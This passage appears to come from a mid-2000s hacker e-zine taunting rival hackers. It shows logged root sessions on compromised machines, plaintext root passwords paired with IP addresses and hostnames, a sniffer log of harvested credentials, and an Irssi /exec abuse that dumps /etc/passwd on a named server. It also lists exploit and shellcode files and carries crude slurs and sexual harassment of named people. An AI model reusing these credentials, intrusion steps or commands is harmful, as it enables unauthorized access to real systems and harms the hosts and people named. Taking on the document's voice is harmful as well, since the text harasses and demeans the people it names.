exploits/TTsharefile*
exploits/imap4life.pl*
exploits/m00-samba-pwnd.tar.bz2*
exploits/proftd_put_down2~m00.c*
exploits/shv5.tar.gz*
examples/fmt:
server-remote.c
examples/heap:
heap.c
examples/stack:
client-remote.c
local.c
local2.c
server-remote.c
~-~-~-~-~-~-~-~-~-~-~-~-~-~
[3] GET HIS PASSWORDZ.
24.177.23.252 skew:5ubiZ3r0
skewtty.dyndns.org
212.202.49.153 skew:*jd4^52h*d2=
~-~ skew rooted boxes ~-~
plet.compumail.co.za
knysna.compumail.co.za
umhlanga.compumail.co.za
lin02.compumail.co.za
histologic.no-ip.info
irenefw.irenecountrylodge.co.za 196.25.22.178
[4] GET HIS SHELLZ:
~-~-~-~-~-~-~-~-~-~-~-~-~-~
skew @ plet: Here we learn Skew has mad eleet codes and sshbrute'z like a bitch.
~-~-~-~-~-~-~-~-~-~-~-~-~-~
login as: root
root@plet's password:
[root@plet root]# cd /tmp/
[root@plet tmp]# ls -al
total 14
drwxrwxrwt 5 root root 360 Jun 14 01:28 ./
drwxr-xr-x 21 root adm 880 May 30 08:20 ../
d--S--S--T 18 root root 1416 Jun 14 01:00 .../
-rw-rw-rw- 1 ratana_g ratana_g 4 Jun 13 15:00 .900.f5a648
drwxrwxrwt 2 xfs xfs 72 Sep 12 2003 .font-unix/
srw------- 1 root root 0 May 22 10:14 .fsav-0=
srw------- 1 root root 0 Jun 14 01:28 .fsav-0-sa=
-rw-r--r-- 1 root root 0 Jun 13 04:10 authfail.log.unsort
-rw-r--r-- 1 root root 0 Jun 13 04:10 denied.log.unsort
-rw-r--r-- 1 root root 554 Jun 14 00:58 ls
-rw-r--r-- 1 root root 0 Jun 13 04:10 sarg.log.unsort
drwx------ 2 root root 80 Feb 27 2003 ssh-XXE002K6/
[root@plet tmp]# cd ...
[root@plet ...]# ls -al
total 159052
d--S--S--T 18 root root 1416 Jun 14 01:00 ./
drwxrwxrwt 5 root root 360 Jun 14 01:30 ../
-rw-r--r-- 1 root root 21788442 Jun 14 01:30 .sniff
-rw-r--r-- 1 root root 121983894 Jan 1 18:25 .sniff.old
-rw-r--r-- 1 root root 6178477 May 20 08:28 .sniff.old2
drwxr-xr-x 12 dlv_bern 1038 1200 Apr 23 20:36 BitchX/
drwxr-sr-x 2 root root 120 Jun 8 04:33 afp/
drwxrwxrwx 8 3232 ntools 928 Jan 14 06:35 cfengine-2.0.7/
-rw-r--r-- 1 root root 1190033 May 15 2003 cfengine-2.0.7.tar.gz
drwxr-sr-x 2 root root 96 Jun 8 18:12 cimap/
drwxr-xr-x 10 1001 wheel 864 Jun 11 15:54 h4ckwebdav/
-rw-r--r-- 1 root root 405818 Jun 11 15:51 h4ckwebdav.tar.gz
-rwx------ 1 root root 12014 Sep 14 2004 hide*
drwxr-sr-x 2 root root 152 Jun 6 17:31 imap/
-rw-r--r-- 1 root root 6550 Apr 23 20:32 index.html
-rw-r--r-- 1 root root 2532476 Mar 27 2004 ircii-pana-1.1-final.tar.gz
-rw-r--r-- 1 root root 1153560 Dec 11 2003 irssi-0.8.9.tar.gz
drwxr-sr-x 5 root root 144 May 12 23:33 john-1.6/
-rw-r--r-- 1 root root 497341 Sep 18 1999 john-1.6.tar.gz
-rw-r--r-- 1 root root 0 Jun 13 05:41 mail.hm
drwxrwxrwx 32 1000 1000 1416 May 28 08:05 mailutils-0.6/
-rw-r--r-- 1 root root 2837017 Dec 23 20:19 mailutils-0.6.tar.gz
drwxrwxrwx 4 500 frog_rud 1824 Jun 8 15:42 nano-1.2.5/
-rw-r--r-- 1 root root 911938 May 16 06:06 nano-1.2.5.tar.gz
-rw-r--r-- 1 root root 1846196 Apr 24 08:58 nmap-3.81.tgz
-rw-r--r-- 1 root root 2105 Dec 11 2004 nmap.log
drwxrwxr-x 7 500 frog_rud 10768 Jun 8 15:56 openssh-3.4p1/
-rw-r--r-- 1 root root 837668 Sep 17 2002 openssh-3.4p1.tar.gz
-rw-r--r-- 1 root root 312224 Jun 24 2004 psyBNC2.3.1.tar.gz
drwxrwxr-x 11 root root 728 Mar 9 08:58 psybnc/
drwxr-sr-x 2 root root 176 May 27 21:41 rlogin/
-rw------- 1 1010 dlv_bern 263 Feb 18 2000 rootkitutil.h
drwxr-xr-x 3 root wheel 216 Jan 2 07:58 shoutcast-1-9-4-linux-glibc6/
-rw-r--r-- 1 root root 152616 Mar 18 2004 shoutcast-1-9-4-linux-glibc6.tar.gz
drwxr-xr-x 2 root root 632 May 11 23:10 shroud-1.30/
-rw-r--r-- 1 root root 9248 Nov 3 2002 shroud-1.30.tgz
-rwxr-xr-x 1 root root 20416 May 13 00:43 sol*
-rw-r--r-- 1 root root 12529 May 13 00:42 sol.c
drwxr-sr-x 2 root root 256 Jun 12 03:37 sshbrute/
-rw-r--r-- 1 root root 2402 Jun 10 06:21 ssheist-1.log
drwxr-sr-x 3 root root 656 May 12 04:03 synscan/
-rw-r--r-- 1 root root 53939 Mar 22 2002 synscan1.6.tar.gz
-rwxr-xr-x 1 root root 19860 May 11 23:13 vanish2*
-rw------- 1 1010 dlv_bern 8525 Feb 18 2000 vanish2.c
-rw-r--r-- 1 root root 3256 Feb 18 2000 vanish2.tgz
[root@plet ...]# head -n 2 nmap.log
Host 196.15.249.65 appears to be up.
Host 196.15.249.66 appears to be up.
[root@plet ...]# cat ssheist-1.log
===========================================================================
Username: root Password: n3tw0rk1ng Host: lin02.*******.**.**
===========================================================================
===========================================================================
Username: root Password: `1q2wsxde Host: lin02.*******.**.**
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: localhost
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.*********.**.**
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.*********.**.**
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: sodwana.*********.**.**
===========================================================================
===========================================================================
Username: root Password: coahtr Host: histologic.*****.****
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.*********.**.**
===========================================================================
===========================================================================
Username: test Password: test Host: 129.*.***.**
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.*********.**.**
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.*********.**.**
===========================================================================
[root@plet ...]# cd john-1.6/
[root@plet john-1.6]# cd run
[root@plet run]# ls
128.8.140.206.shadow john.ini restore
all.chr john.pot unafs@
alpha.chr lanman.chr unique@
digits.chr mailer* unshadow@
john* password.lst
[root@plet run]# ps aux |grep sshbrute
root 14207 0.0 0.0 2632 764 ? S Jun03 0:12 ./sshbrute -brute
root 27645 0.0 0.0 2632 760 ? S Jun10 0:04 ./sshbrute2 -brut
root 27695 0.0 0.0 2632 760 ? S Jun10 0:01 ./sshbrute2 -brut
root 27805 0.0 0.0 2632 764 ? S Jun10 0:00 ./sshbrute -brute
root 26355 0.0 0.0 2632 764 ? S Jun11 0:00 ./sshbrute -brute
root 32265 0.0 0.0 2632 764 ? S Jun12 0:00 ./sshbrute -brute
root 32275 0.0 0.0 2632 760 ? S Jun12 0:00 ./sshbrute2 -brut
root 18328 0.5 0.1 2800 1268 ? S 01:29 0:01 ./sshbrute -brute
root 18369 0.3 0.1 2796 1296 ? S 01:30 0:00 ./sshbrute -brute
root 18397 0.5 0.1 2796 1296 ? S 01:31 0:00 ./sshbrute -brute
root 18433 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut
root 18436 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute -brute
root 18459 0.2 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut
root 18470 0.2 0.1 2784 1120 ? S 01:33 0:00 ./sshbrute2 -brut
root 18471 0.0 0.1 3172 1320 pts/4 R 01:33 0:00 ps aux
[root@plet run]# logout
----------------------------------
skew @ histologic: nothing much here but more pr00f skew == tal0n.
----------------------------------
login as: root
root@histologic's password:
Last login: Tue Jun 14 04:51:51 2005 from adsl-10-197-59.mia.bellsouth.net
[root@histofw root]# history | grep talon
963 adduser talon
964 passwd talon
965 su talon
966 userdel talon
967 userdel -r talon
968 rm -rf /home/talon
[root@histofw root]# ls -al /tmp/.../
total 16
drwx------ 2 root root 4096 Jun 12 06:03 ./
drwxrwxrwt 6 root root 4096 Jun 14 05:14 ../
-rw-r--r-- 1 root root 5595 Jun 12 14:30 nmap.log
------------------------------------
skew @ knysna: absolutely nothing here just some lame hacking attempts it seems.
------------------------------------
login as: root
root@knysna's password:
Last login: Tue Jun 14 01:42:21 2005 from dsl-5-37.sg-b.tiscali.no
[root@knysna root]# history | tail -n11
987 w
988 cat /var/tmp/.ssheiost.log
989 cat /var/tmp/.ssheist.log
990 host 196.**.***.***
991 host 196.**.**.***
992 ssh root@196.**.**.***
993 cat /var/tmp/.ssheist.log
994 host 196.**.**.***
995 cat > /var/tmp/.ssheist.log
996 cat /var/tmp/.ssheist.log
997 exit
[root@knysna root]# ls -al '/tmp/.../'
total 8
drwx------ 2 root root 4096 Jun 8 16:32 ./
drwxrwxrwt 5 root root 4096 Jun 14 04:03 ../
[root@knysna root]# ls -al /car/tmp/v
total 8
drwxrwxrwt 2 root root 4096 Jun 14 04:03 ./
drwxr-xr-x 20 root root 4096 Aug 31 2004 ../
-rw-r--r-- 1 root root 0 Jun 13 15:32 .ssheist.log
[root@knysna root]# logout
~-~-~-~-~-~-~-~-~-~-~-~-~-~
> From these shells we notice a few things:
1. that tal0n sets up sshbrute (his ssh brute forcer)
1: that tal0n sets up ssheist (his ssh sniffer)
2: he usually makes a dir /.../ in /tmp/ so if you have /tmp/.../ you have been
owned by skew. but thats fucking impossible unless youre a complete dumbshit
3: skew cant hack.
~-~-~-~-~-~-~-~-~-~-~-~-~-~
[5] LAUGH FOR DAYZ AT THIS DORK
~-~-~-~-~-~-~-~-~-~-~-~-~-~
I hope skew has learned from all of this not to talk shit about people dont
fuck over your friends (now you know how it feels) stop coding complete shit,
stop the lies, admit youre tal0n, and dont think you are better than us. you
are not.
-~-~-~
NEWZ: sources report after his latest own skew has changed nicks again!
IMAGINE THAT! sources say his new handle is tivofreakr2d2.. rm on sight.
-~-~-~
-~-~-~
MORENEWZ: being tiped off tal0n has changed his nick again. rm bandit at will.
-~-~-~
06.txt -~-~-~ k33p1ng 0d4y s4f3 (th3 v3rs10n phC n3v3r w4nt3d y0u t0 s33!!)
l3tz jump r1ght 1nt0 th3 th30ry 0f w4r3z st34l1ng. 4s th3 gr34t
sun s3cur1ty 3xp3rt l4nc3 sp1tzc0q 0nc3 s41d "t0 kn0w 4 h4qu3r
y0u n33d t0 sl33p w1th 4 haqu3r", much th3 s4m3 c4n b3 s41d
4b0ut 0d4yyzz. y0u n33d t0 f1nd wh3r3 th3y l1v3. y0u n33d t0
curl up w1th th3m l4t3 4t n1ght wh3n m0mmy 1z sl33p1ng. Th3y
4r3 usu4lly 1n grep 'h4qu3r' /etc/passwd's $H0M3. 0r 4s w3
c4n s33 1n twd`z ~/
Aug 01 05:15:46 <twd> HELL YEAH!
Aug 01 05:15:46 <Fac51> | ___| | / _ \ / _ \| _ \
Aug 01 05:15:46 <Fac51> | |_ | | | | | | | | | | | |
Aug 01 05:15:46 <Fac51> | _| | |__| |_| | |_| | |_| |
Aug 01 05:15:46 <Fac51> |_| |_____\___/ \___/|____/
Aug 01 05:15:48 <Fac51>
Aug 01 05:15:53 <twd> be el8
Aug 01 05:15:59 <Fac51> RESPEK NIGGA... WOOPTY-WOO
Aug 01 05:16:02 <twd> I AM FLOODING YOU LAWL
Aug 01 05:16:04 <twd> I AM FLOODING YOU LAWL
Aug 01 05:16:07 <twd> I AM FLOODING YOU LAWL
Aug 01 05:16:14 <twd> wanna see some 0day w4r3z?
Aug 01 05:16:50 <Fac51> vista?
Aug 01 05:16:51 <Fac51> lol
Aug 01 05:16:59 <twd> /usr/home/twd
Aug 01 05:17:08 <twd> thatz where all my 0day ju4r3z iz ^^
Aug 01 05:17:30 <twd> bettar yet
Aug 01 05:17:35 <twd> total 55144
Aug 01 05:17:36 <twd> drwxr-xr-x 12 twd leet 1024 Jul 31 19:01 .
Aug 01 05:17:36 <twd> drwxr-xr-x 4 root whe 512 Jun 29 15:00 ..
Aug 01 05:17:36 <twd> drwx------ 3 twd leet 512 Jun 29 03:05 .BitchX
Aug 01 05:17:36 <twd> -rw-r--r-- 1 twd leet 771 Jun 29 01:52 .cshrc
Aug 01 05:17:36 <-- twd has quit (Excess Flood)
t00 m4ny 0d4yz!!! n0w th1z c0ckg0bbl3r s4yz h3 c0d3z 0d4yz 3v3ryd4y,
but h3'z t00 f4t t0 us3 th3 c0mput4r th4t much. h1z m0m h3lpz h1m
g3t 0ut 0f b3d 0n th3 w33k3ndz s0 h3 c4n c0d3 3 l1n3z 0f ass3mbly.
b3c4us3 0f th1z 1nc3ns3 r3l4t10nsh1p A n3tw0rk 0f truzt w4z f0rm3d.
3v3n th0ugh w3 4r3 g0nn4 3xpl01t 1t w3 r3sp3ct th3 m0m r4p3, s0 w3'll
l34v3 th31r 3v3r-l4st1ng l0v3 4l0n3.
l3tz s33 wh4t h4pp3ndz wh3n w3 msg el1t3_twd`z_m0m 0n msn...
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : hello sexy young boy.
h0fuckno@yourbox.di0adsux.com : huuuuu!!!
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : tell me what you want.
h0fuckno@yourbox.di0adsux.com : 3y3 w4nt 0d4yz
h0fuckno@yourbox.di0adsux.com : g1v3 m3 twd`z r00t p4zz
h0fuckno@yourbox.di0adsux.com : pl34s3 wh0r3.
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : ok. let me first get comfortable.
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : /me takes off her granny panties
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : /me lights a candle
h0fuckno@yourbox.di0adsux.com : b1tch pl34z3. 3y3'm buzy.
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : ok ok.
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : I guess I'll dance for twd tonight
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : ssh twd.likes-mum.com -ltwd -p1337
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : pass: BiSons4Mumz
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
m0mmy_d34r3zt@twdz-mumz.org : you bastard! atleast finger fuck me!
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
- msg not recieved. user is currently on ignore list -
0kz, s0 sh3'z nutz 4z fuq, but y0u s33 th1z 1z br0k3n truzt. f0r
m0re 1nf0rm4t10n r34d th0mps0n'z p4p3r 0n truzt1ng truzt, 0r h1z
l3zz3r kn0wn p4p3r 0n truzt1ng tr0j4n c0nd0mz. h3h3h3.
-~-~-~ !!!th1z juzt 1n!!! ~-~-~-~
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : I thought you could only get pregnate
el1t3_twd`z_m0m@h0t-n-h0rny-mumz.us : if the son's cock was more than 2 1/2
inches long.
h0fuckno@yourbox.di0adsux.com : http://acm.org/paperz/truzting_condomz.txt y0u
dumb cunt!
sh3'z pr3gn4t3!! 3y3 d3t3ct 4n0th3r r3t4rd w1ll s00n 3nt3r th3
bl00dl1n3. sh3 b3tt3r l4y 0ff th3 fuqn h3r01n.
-~-~-~ b4q t0 th3 w4r3z hunt ~-~-~-~
4nyw4yz. twd` m0m 1z 4 d1rty wh0r3 4nd twd`z g0t s0m3 0d4yz t0
st34l. 0n w1th th3 sh0w...
[(root@r0q1ngw1thch4rt3r) (/) ] # ls -al /usr/home/twd
total 55144
drwxr-xr-x 12 twd leet 1024 Jul 31 19:01 .
drwxr-xr-x 4 root wheel 512 Jun 29 15:00 ..
drwx------ 3 twd leet 512 Jan 02 1998
drwx------ 3 twd leet 512 Jun 29 03:05 .BitchX
-rw-r--r-- 1 twd leet 771 Jun 29 01:52 .cshrc
drwxr-x--- 3 twd fedz 512 Jul 31 19:01 .n4rql0gz
lrwxrwxrwx 1 twd leet 9 Jan 02 1998 .3y3d0nth4v34nyth1ng -> /dev/null
lrwxrwxrwx 1 twd leet 9 Jun 02 1998 .pl34zel34v3m34l0n3 -> /bin/exit
[(root@r0q1ngw1thch4rt3r) (/) ] #
wtf, wh3r3z th3 0d4yz? .n4rql0gz 1s juzt 4 l0g 0f #netwhores@efnet (<- d0rk13st
pl4c3 0n 34rth) 4nd s0m3 l0gz 0f d1v1n31nt try1ng t0 h4q 4 w1nd0wz b0x.
1t turnz 0ut, 4ft3r cl0s3 1nsp3ct10n th4t th3r3 1z 4 s3cr3t d1r us1ng 0ld h4ck3r
tr1ck!!!
[(root@r0q1ngw1thch4rt3r) (/) ] # cd "/usr/home/twd/ "
[(root@r0q1ngw1thch4rt3r) (/usr/home/twd/ ) ] # ls -al
total 55144
drwx------ 12 twd leet 1024 Jun 02 1998 .
drwxr-xr-x 4 twd leet 512 Jul 31 19:01 ..
drwx------ 3 twd leet 512 Jan 02 1998 mumpiqz
-rw------- 1 twd leet 771 Nov 24 1997 mircd0s.sh
-rw------- 1 twd leet 771 Dec 08 1997 abo1.c
-rw------- 1 twd leet 771 Jan 01 1998 sshbrute3.c
[(root@r0q1ngw1thch4rt3r) (/usr/home/twd/ ) ] #
buh4h4h4h4. h3 h4z n0 0d4yz, but w3 scp'd th3s3 4nyw4yz.
twd`, y0u suq.
twd`_mum, y0u suq twd`.
burn3y3, y0u suq.
byt3r4g3, y0ur rul3!
wr1tt1ng 0d4yz 0n p4p3r 1z th3 0nly w4y h0no d03z 1t.
(d0nt pr1nt 1t.. fx 1z sn1ff1ng y0ur pr1nt3r!!)
07.txt -~-~-~ g0tfuq3d, g0t0wn3d, g0tn00d4yz4h0not0st34l...
/* GotFaulT ....
____ __ _____ __ __
/\ _`\ /\ \__/\ __`\ /'__`\ /\ \
\ \ \L\_\ ___\ \ ,_\ \ \/\ \ __ __ __ ___ /\_\L\ \ \_\ \
\ \ \L_L / __`\ \ \/\ \ \ \ \/\ \/\ \/\ \ /' _ `\/_/_\_<_ /'_` \
\ \ \/, \/\ \L\ \ \ \_\ \ \_\ \ \ \_/ \_/ \/\ \/\ \/\ \L\ \/\ \L\ \
\ \____/\ \____/\ \__\\ \_____\ \___x___/'\ \_\ \_\ \____/\ \___,_\
\/___/ \/___/ \/__/ \/_____/\/__//__/ \/_/\/_/\/___/ \/__,_ /
th1s h0m0'5 4r3 l4me.. 5eC c0mmuN1Ty'z 4re Pl4YeD 0u7 f00lz..
y0u 9uYz 5uR3 d0 GoTFauLT 7h0hGh.. Y0uZ GoTFaulTY C0d1nd h0h0h0h0
*/
login as: publisher
publisher@gotfault.org's password:
Last login: Wed Jun 12 12:10:36 2005 from h.0.n.o
Enable ANSi? [Y/n]> Y
B+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
| |
| ________ __ _____ .__ __ |
| / _____/ _____/ |__/ ____\____ __ __| |_/ | |
| / \ ___ / _ \ __\ __\\__ \ | | \ |\ __\ |
| \ \_\ ( <_> ) | | | / __ \| | / |_| | |
| \______ /\____/|__| | | (____ /____/|____/__| |
| \/ | | \/ |
| | | |
| <A>udits | | <C>chat|
| <T>oolbox | | <B>lackboard|
| <P>apers | | <O>ptions|
| <E>xploits | | <W>ho's Online |
| <S>nipplets |__| <L>ogout |
| |
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
gotfault> C
14:28 -!- Irssi: Looking up localhost14:28 -!- Irssi: Connecting to localhost
h4h4h4 irssi 0wnz th3m.
[(status)]
[14:28] [publisher] [1:localhost (change with ^X)]
14:28 -!- Irssi: Connection to localhost established
[publisher] [1:localhost (change with ^X)]
[14:29]/exec uname -a;id
14:29 Linux gerrit 2.4.29-vs1.2.10 #3 SMP Mo Apr 11 17:42:48 CEST 2005 i686 GNU/Linux
14:29 uid=1006(publisher) gid=1006(publisher) groups=1006(publisher)
14:29 -!- Irssi: process 0 (uname -a;id) terminated with return
code 0
/exec ls -al
14:29 total 4014:29 drwx------ 8 publisher publisher 4096 May 23 04:46 .
14:29 drwxr-xr-x 16 root root 4096 Jun 4 15:56 ..
14:29 -rw------- 1 publisher root 6 May 23 14:39 .bash_history
14:29 drwx------ 2 publisher publisher 4096 May 22 19:42 .irssi
14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:33 ansi
14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:42 ascii
14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:36 bin
14:29 drwxr-xr-x 9 publisher publisher 4096 May 23 04:40 database
14:29 -rwxr-xr-x 1 publisher publisher 1124 May 22 19:52 publisher
14:29 drwxr-xr-x 2 publisher publisher 4096 May 23 04:33 scripts
14:29 -!- Irssi: process 0 (ls -al) terminated with return
code 0
wh0z uP 1n hUr!?!?
/exec cat /etc/passwd
14:30 root:x:0:0:root:/root:/bin/bash
14:30 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
14:30 bin:x:2:2:bin:/bin:/bin/sh
14:30 sys:x:3:3:sys:/dev:/bin/sh
14:30 sync:x:4:65534:sync:/bin:/bin/sync
14:30 games:x:5:60:games:/usr/games:/bin/sh
14:30 man:x:6:12:man:/var/cache/man:/bin/sh
14:30 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
14:30 mail:x:8:8:mail:/var/mail:/bin/sh
14:30 news:x:9:9:news:/var/spool/news:/bin/sh
14:30 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
14:30 proxy:x:13:13:proxy:/bin:/bin/sh
14:30 postgres:x:31:32:postgres:/var/lib/postgres:/bin/false
14:30 www-data:x:33:33:www-data:/var/www:/bin/sh
14:30 backup:x:34:34:backup:/var/backups:/bin/sh
14:30 operator:x:37:37:Operator:/var:/bin/false
14:30 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
14:30 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
14:30 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
14:30 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
14:30 sshd:x:100:65534::/var/run/sshd:/bin/false
14:30 postfix:x:101:101::/var/spool/postfix:/bin/false
14:30 mysql:x:102:103:MySQL Server:/var/lib/mysql:/bin/false
14:30 vmail:x:2000:2000::/home/vmail:/bin/false
14:30 snort:x:103:104:Snort IDS:/var/log/snort:/bin/false
14:30 smmsp:x:104:105:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
14:30 setnf:x:1000:100::/home/setnf:/bin/bash
14:30 fourtrax:x:1002:1002:,,,:/home/fourtrax:/bin/bash
14:30 posidron:x:2002:100::/home/posidron:/bin/bash
14:30 rushjo:x:2003:100::/home/rushjo:/bin/bash
14:30 sirphreak:x:2004:100::/home/sirphreak:/bin/bash
14:30 awk:x:2005:100::/home/awk:/bin/bash
14:30 spot:x:2006:100::/home/spot:/bin/bash
14:30 khz:x:2007:100::/home/khz:/bin/bash
14:30 peacetreaty:x:1001:1001:,,,:/home/peacetreaty:/bin/bash
14:30 certificate:x:1003:1003:Certificate User,,,:/home/certificate:/home/certificate/bin/stncert/buildssh
14:30 nutshell:x:1004:1004:,,,:/home/nutshell:/bin/bash
14:30 phyro:x:1005:1005:,,,:/home/phyro:/bin/bash
14:30 publisher:x:1006:1006:Publisher System,,,:/home/publisher:/home/publisher/publisher
14:30 trapdown:x:1007:1007:,,,:/home/trapdown:/bin/bash
-!- Irssi: process 0 (cat /etc/passwd) terminated with return
code 0
/exec ls -al /home/
14:31 total 64
14:31 drwxr-xr-x 16 root root 4096 Jun 4 15:56 .
14:31 drwxr-xr-x 17 root root 4096 Jun 13 02:11 ..
14:31 drwx------ 4 awk users 4096 Jun 14 00:32 awk < GRRRAAWWWLLLL!!!! AWK!!! GRRRAAWWWL!LL!!!@#
14:31 drwx------ 6 certificate certificate 4096 Jun 15 07:48 certificate
14:31 drwx------ 2 fourtrax users 4096 Jan 3 20:43 fourtrax
14:31 drwx------ 3 khz users 4096 May 27 15:02 khz
14:31 drwx------ 5 nutshell users 4096 Jun 10 02:40 nutshell
14:31 drwx------ 2 peacetreaty users 4096 Apr 19
14:31 drwx------ 8 phyro users 4096 May 28 22:26 phyro
14:31 drwx------ 12 posidron users 4096 Jun 15 08:34 posidron < th1s m0f0 w1ll sh3llc0d3 y0u t0 d3f !!
14:31 drwx------ 8 publisher publisher 4096 May 23 04:46 publisher
14:31 drwx------ 5 rushjo users 4096 Apr 29 01:39 rushjo
14:31 drwxrwxr-x 9 521 521 4096 Jun 14 23:16 setnf
14:31 drwx------ 9 sirphreak users 4096 Jun 1 09:29 sirphreak
14:31 drwx------ 6 spot users 4096 May 16 02:39 spot
14:31 drwx------ 5 trapdown trapdown 4096 Jun 7 03:12 trapdown
14:31 -!- Irssi: process 0 (ls -al /home/) terminated with return
code 0
/exec locate * |grep home
14:32 /home/publisher/ansi
14:32 /home/publisher/ansi/audits.menu
14:32 /home/publisher/ansi/blackboard.menu
14:32 /home/publisher/ansi/bytecode.menu
14:32 /home/publisher/ansi/exploits.menu
14:32 /home/publisher/ansi/main.menu
14:32 /home/publisher/ansi/options.menu
14:32 /home/publisher/ansi/papers.menu
14:32 /home/publisher/ansi/snipplets.menu
14:32 /home/publisher/ansi/tools.menu
14:32 /home/publisher/ascii
14:32 /home/publisher/ascii/audits.menu
14:32 /home/publisher/ascii/bytecode.menu
14:32 /home/publisher/ascii/exploits.menu
14:32 /home/publisher/ascii/main.menu
14:32 /home/publisher/ascii/options.menu
14:32 /home/publisher/ascii/papers.menu
14:32 /home/publisher/ascii/snipplets.menu
14:32 /home/publisher/ascii/tools.menu
14:32 /home/certificate/bin
14:32 /home/certificate/bin/stncert
14:32 /home/certificate/bin/stncert.tgz
14:32 /home/certificate/bin/stncert/buildssh
14:32 /home/certificate/bin/stncert/build_ca.sh
14:32 /home/certificate/bin/stncert/build_ca_cert.sh
14:32 /home/certificate/bin/stncert/build_cert.sh
14:32 /home/certificate/bin/stncert/email.txt
14:32 /home/certificate/bin/stncert/ircs.conf
14:32 /home/certificate/bin/stncert/README
14:32 /home/certificate/bin/stncert/removepass.sh
14:32 /home/certificate/bin/stncert/stunnel.pid
14:32 /home/posidron/audit/daemons/jukepeg-1.9/mpglib/tabinit.c
14:32 /home/posidron/audit/ftpd/kadet/bin
14:32 /home/posidron/audit/ftpd/kadet/bin/kadet
14:32 /home/posidron/audit/ftpd/kadet/bin/kadet.in
14:32 /home/posidron/audit/ftpd/kadet/bin/mod
14:32 /home/posidron/audit/ftpd/kadet/bin/mod.in
14:32 /home/posidron/audit/ftpd/pftpd-1.0/.gdbinit
14:32 /home/posidron/audit/httpd/aolserver-4.0.10/nsd/binder.c
14:32 /home/posidron/audit/httpd/aolserver-4.0.10/nsdb/dbinit.c
14:32 /home/posidron/audit/httpd/boa-0.94.13/src/webindex.pl
14:32 /home/posidron/audit/httpd/monkey-0.9.1/bin
14:32 /home/posidron/audit/httpd/monkey-0.9.1/cgi-bin
14:32 /home/posidron/audit/httpd/monkey-0.9.1/cgi-bin/test.pl
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wncat
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnhtmlify
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnindexmaker
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnpnuts
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnredir
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnsectsearch
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnseven_m
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnv2c
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_mkdigest
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_mkpasswd
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_uncache
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/intl/bindtextdom.c
14:32 /home/posidron/audit/local/usr/local/bin
14:32 /home/posidron/audit/local/usr/local/bin/libmikmod-config
14:32 /home/posidron/dump/bytecode/shellcodes/aix/aix-execve_bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/all-OS/LNX-FBSD-bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/alpha/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/alpha/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/alpha/portbindsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bind.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bsdi-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bsdi-execve_binsh2.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-bin-sh.S
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh.netbsd.c
